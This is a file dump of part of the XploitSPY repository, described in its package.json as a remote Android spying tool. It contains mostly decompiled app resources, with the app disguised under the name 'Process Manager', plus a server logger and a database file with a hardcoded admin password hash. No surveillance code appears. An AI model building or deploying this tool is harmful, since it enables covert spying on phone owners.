https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xxxhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xxxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xxxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-af/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-am/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ar/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-as/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | ৯৯৯+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-az/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-b+sr+Latn/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-be/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-bg/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-bn/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | ৯৯৯+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-bs/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ca/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-cs/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-da/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-de/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-el/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-en-rAU/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-en-rCA/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-en-rGB/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-en-rIN/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-en-rXC/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | ‎‏‎‎‎‎‎‏‎‏‏‏‎‎‎‎‎‏‎‎‏‎‎‎‎‏‏‏‏‏‏‏‏‏‎‏‏‏‎‏‏‎‏‏‏‎‏‏‎‎‎‎‏‎‏‎‎‎‏‏‏‏‏‎‏‏‏‎‏‎‏‎‏‏‏‎‎‏‎‏‏‏‎‏‏‏‏‏‏‏‎‎‎‏‏‎999+‎‏‎‎‏‎ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-es-rUS/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-es/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | +999 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-et/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-eu/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-fa/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-fi/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-fr-rCA/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-fr/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-gl/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | >999 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-gu/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-hi/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-hr/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-hu/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-hy/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-in/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-is/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-it/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-iw/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ja/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ka/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-kk/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-km/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-kn/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ko/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ky/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-lo/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-lt/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-lv/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-mk/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ml/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-mn/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-mr/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | ९९९+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ms/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-my/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | ၉၉၉+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-nb/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ne/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | ९९९+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-nl/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-or/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-pa/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-pl/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-pt-rBR/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-pt-rPT/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-pt/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ro/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ru/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-si/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-sk/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-sl/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-sq/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-sr/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-sv/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-sw/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ta/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-te/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-th/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-tl/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-tr/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-uk/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-ur/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | +999 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-uz/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-v16/dimens.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4.0dip 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-v21/colors.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | @color/secondary_text_default_material_light 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-v21/dimens.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 0.0dip 4 | 0.0dip 5 | 12.0dip 6 | 7 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-v21/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 10 | 15 | 16 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-vi/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-w820dp/dimens.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 64.0dip 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-zh-rCN/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-zh-rHK/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-zh-rTW/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values-zu/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999+ 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/attrs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/colors.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #ffff4081 4 | #ff3f51b5 5 | #ff303f9f 6 | #ffffffff 7 | #ffffffff 8 | #ff9e9e9e 9 | #1f000000 10 | #8a000000 11 | 12 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/drawables.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #3333b5e5 4 | #0cffffff 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/ids.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/integers.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 999 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | Process Manager 4 | 999+ 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/values/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 9 | 14 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /server/assets/webpublic/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/assets/webpublic/logo.png -------------------------------------------------------------------------------- /server/clientData/blank: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/clientData/blank -------------------------------------------------------------------------------- /server/includes/logManager.js: -------------------------------------------------------------------------------- 1 | const db = require('./databaseGateway'); 2 | 3 | module.exports = { 4 | log: (type, message) => { 5 | db.maindb.get('admin.logs').push({ 6 | "time": new Date(), 7 | type: type.name, 8 | message 9 | }).write(); 10 | console.log(type.name, message); 11 | }, 12 | getLogs: () => { 13 | return db.maindb.get('admin.logs').sortBy('time').reverse().value(); 14 | } 15 | } -------------------------------------------------------------------------------- /server/maindb.json: -------------------------------------------------------------------------------- 1 | { 2 | "admin": { 3 | "username": "admin", 4 | "password": "5f4dcc3b5aa765d61d8327deb882cf99", 5 | "loginToken": "97d5d9887360786b09e7ff89df307e72", 6 | "logs": [ 7 | { 8 | "time": "2020-01-11T15:23:07.971Z", 9 | "type": "SUCCESS", 10 | "message": "Build Succeded!" 11 | } 12 | ], 13 | "ipLog": [] 14 | }, 15 | "clients": [] 16 | } -------------------------------------------------------------------------------- /server/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "xploitspy", 3 | "version": "1.0.0", 4 | "description": "XploitSPY - Remote Android Spying Tool", 5 | "main": "index.js", 6 | "scripts": { 7 | "start": "node index.js", 8 | "test": "node index.js" 9 | }, 10 | "author": "ETechD", 11 | "license": "ISC", 12 | "dependencies": { 13 | "body-parser": "^1.19.0", 14 | "cookie-parser": "^1.4.4", 15 | "ejs": "^2.6.2", 16 | "express": "^4.17.1", 17 | "geoip-lite": "^1.3.7", 18 | "lowdb": "^1.0.0", 19 | "socket.io": "^2.2.0" 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /system.properties: -------------------------------------------------------------------------------- 1 | java.runtime.version=11 2 | --------------------------------------------------------------------------------